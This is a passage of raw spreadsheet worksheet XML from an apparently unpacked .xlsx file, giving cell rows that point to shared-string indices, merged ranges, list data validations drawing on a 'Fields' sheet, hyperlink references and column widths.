      </c>
      <c r="Q24" s="22" t="s">
        <v>123</v>
      </c>
      <c r="R24" s="23"/>
      <c r="S24" s="22" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="25" ht="129.0" customHeight="1">
      <c r="C25" s="21">
        <v>18.0</v>
      </c>
      <c r="D25" s="22" t="s">
        <v>68</v>
      </c>
      <c r="E25" s="22" t="s">
        <v>110</v>
      </c>
      <c r="F25" s="22" t="s">
        <v>125</v>
      </c>
      <c r="G25" s="22" t="s">
        <v>126</v>
      </c>
      <c r="H25" s="22" t="s">
        <v>127</v>
      </c>
      <c r="I25" s="23"/>
      <c r="J25" s="23"/>
      <c r="K25" s="22" t="s">
        <v>43</v>
      </c>
      <c r="L25" s="22" t="s">
        <v>128</v>
      </c>
      <c r="M25" s="22">
        <v>15.0</v>
      </c>
      <c r="N25" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O25" s="23"/>
      <c r="P25" s="29" t="s">
        <v>129</v>
      </c>
      <c r="Q25" s="22" t="s">
        <v>130</v>
      </c>
      <c r="R25" s="23"/>
      <c r="S25" s="22" t="s">
        <v>131</v>
      </c>
      <c r="U25" s="26"/>
    </row>
    <row r="26" ht="129.0" customHeight="1">
      <c r="C26" s="21">
        <v>19.0</v>
      </c>
      <c r="D26" s="22" t="s">
        <v>68</v>
      </c>
      <c r="E26" s="22" t="s">
        <v>110</v>
      </c>
      <c r="F26" s="22" t="s">
        <v>132</v>
      </c>
      <c r="G26" s="22" t="s">
        <v>133</v>
      </c>
      <c r="H26" s="27" t="s">
        <v>134</v>
      </c>
      <c r="I26" s="23"/>
      <c r="J26" s="23"/>
      <c r="K26" s="22" t="s">
        <v>55</v>
      </c>
      <c r="L26" s="22" t="s">
        <v>135</v>
      </c>
      <c r="M26" s="22">
        <v>5.0</v>
      </c>
      <c r="N26" s="22" t="s">
        <v>55</v>
      </c>
      <c r="O26" s="23"/>
      <c r="P26" s="23"/>
      <c r="Q26" s="23"/>
      <c r="R26" s="23"/>
      <c r="S26" s="22" t="s">
        <v>136</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sheetData>
  <mergeCells count="17">
    <mergeCell ref="C4:C6"/>
    <mergeCell ref="D4:D6"/>
    <mergeCell ref="E4:E6"/>
    <mergeCell ref="F4:F6"/>
    <mergeCell ref="G4:G6"/>
    <mergeCell ref="H4:H6"/>
    <mergeCell ref="I4:I6"/>
    <mergeCell ref="S4:S6"/>
    <mergeCell ref="S7:S8"/>
    <mergeCell ref="S11:S12"/>
    <mergeCell ref="J4:J6"/>
    <mergeCell ref="K4:K6"/>
    <mergeCell ref="L4:L6"/>
    <mergeCell ref="M4:M6"/>
    <mergeCell ref="N4:N6"/>
    <mergeCell ref="O4:Q5"/>
    <mergeCell ref="R4:R6"/>
  </mergeCells>
  <dataValidations>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="B1">
      <formula1>Fields!$H$2:$H$4</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="P17"/>
    <hyperlink r:id="rId2" ref="P18"/>
    <hyperlink r:id="rId3" ref="P19"/>
    <hyperlink r:id="rId4" ref="P21"/>
    <hyperlink r:id="rId5" ref="H26"/>
  </hyperlinks>
  <printOptions/>
  <pageMargins bottom="0.75" footer="0.0" header="0.0" left="0.7" right="0.7" top="0.75"/>
  <pageSetup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1.86"/>
    <col customWidth="1" min="3" max="3" width="17.71"/>
    <col customWidth="1" min="4" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" customHeight="1">
      <c r="A1" s="5"/>
      <c r="B1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="C1" s="6" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="2" ht="14.25" customHeight="1"/>
    <row r="3" ht="14.25" customHeight="1">
      <c r="A3" s="30" t="s">
        <v>137</v>
      </c>
      <c r="B3" s="16"/>
    </row>
    <row r="4" ht="14.25" customHeight="1">
      <c r="A4" s="6">
        <v>1.0</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>138</v>
      </c>
      <c r="C4" s="31" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="5" ht="14.25" customHeight="1">
      <c r="A5" s="6">
        <v>2.0</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>139</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6" ht="14.25" customHeight="1">
      <c r="A6" s="6">
        <v>3.0</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>140</v>
      </c>
      <c r="C6" s="31" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" ht="14.25" customHeight="1">
      <c r="A7" s="6">
        <v>4.0</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>141</v>
      </c>
      <c r="C7" s="31" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="8" ht="14.25" customHeight="1">
      <c r="A8" s="6">
        <v>5.0</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>142</v>
      </c>
      <c r="C8" s="31" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="9" ht="14.25" customHeight="1">
      <c r="A9" s="6">
        <v>6.0</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>143</v>
      </c>
      <c r="C9" s="31" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" ht="14.25" customHeight="1">
      <c r="A10" s="6">
        <v>7.0</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>144</v>
      </c>
      <c r="C10" s="31" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" ht="14.25" customHeight="1">
      <c r="A11" s="6">
        <v>8.0</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>145</v>
      </c>
      <c r="C11" s="31" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="12" ht="14.25" customHeight="1">
      <c r="A12" s="6">
        <v>9.0</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>147</v>
      </c>
      <c r="C12" s="31" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="13" ht="14.25" customHeight="1">
      <c r="A13" s="6">
        <v>10.0</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>148</v>
      </c>
      <c r="C13" s="31" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="14" ht="14.25" customHeight="1">
      <c r="A14" s="6">
        <v>11.0</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>150</v>
      </c>
      <c r="C14" s="31" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="15" ht="14.25" customHeight="1">
      <c r="A15" s="6">
        <v>12.0</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>151</v>
      </c>
      <c r="C15" s="32" t="s">
        <v>152</v>
      </c>
      <c r="D15" s="33"/>
      <c r="E15" s="33"/>
      <c r="F15" s="33"/>
      <c r="G15" s="33"/>
      <c r="H15" s="33"/>
      <c r="I15" s="34"/>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3:B3"/>
    <mergeCell ref="C15:I15"/>
  </mergeCells>
  <dataValidations>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="C6:C9">
      <formula1>Fields!$E$2:$E$7</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showErrorMessage="1" sqref="C4:C5 C10:C14">
      <formula1>Fields!$E$2:$E$6</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5.0"/>
    <col customWidth="1" min="6" max="7" width="8.71"/>
    <col customWidth="1" min="8" max="8" width="13.43"/>
    <col customWidth="1" min="9" max="9" width="8.71"/>
    <col customWidth="1" min="10" max="10" width="21.86"/>
    <col customWidth="1" min="11" max="11" width="8.71"/>
    <col customWidth="1" min="12" max="12" width="17.43"/>
    <col customWidth="1" min="13" max="26" width="8.71"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25" customHeight="1">
      <c r="E1" s="35" t="s">
        <v>153</v>
      </c>
      <c r="H1" s="35" t="s">
        <v>154</v>
      </c>
      <c r="J1" s="35" t="s">
        <v>155</v>
      </c>
      <c r="L1" s="35" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="2" ht="14.25" customHeight="1">
      <c r="E2" s="36" t="s">
        <v>146</v>
      </c>
      <c r="H2" s="36" t="s">
        <v>6</v>
      </c>
      <c r="J2" s="36" t="s">
        <v>156</v>
      </c>
      <c r="L2" s="36" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="3" ht="14.25" customHeight="1">
      <c r="E3" s="36" t="s">
        <v>13</v>
      </c>
      <c r="H3" s="36"/>
      <c r="J3" s="36" t="s">
        <v>157</v>
      </c>
      <c r="L3" s="36" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="4" ht="14.25" customHeight="1">
      <c r="E4" s="36" t="s">
        <v>10</v>
      </c>
      <c r="H4" s="36"/>
      <c r="J4" s="36" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="5" ht="14.25" customHeight="1">
      <c r="E5" s="36" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" ht="14.25" customHeight="1">
      <c r="E6" s="36" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="7" ht="14.25" customHeight="1">
      <c r="E7" s="36" t="s">
        <v>160</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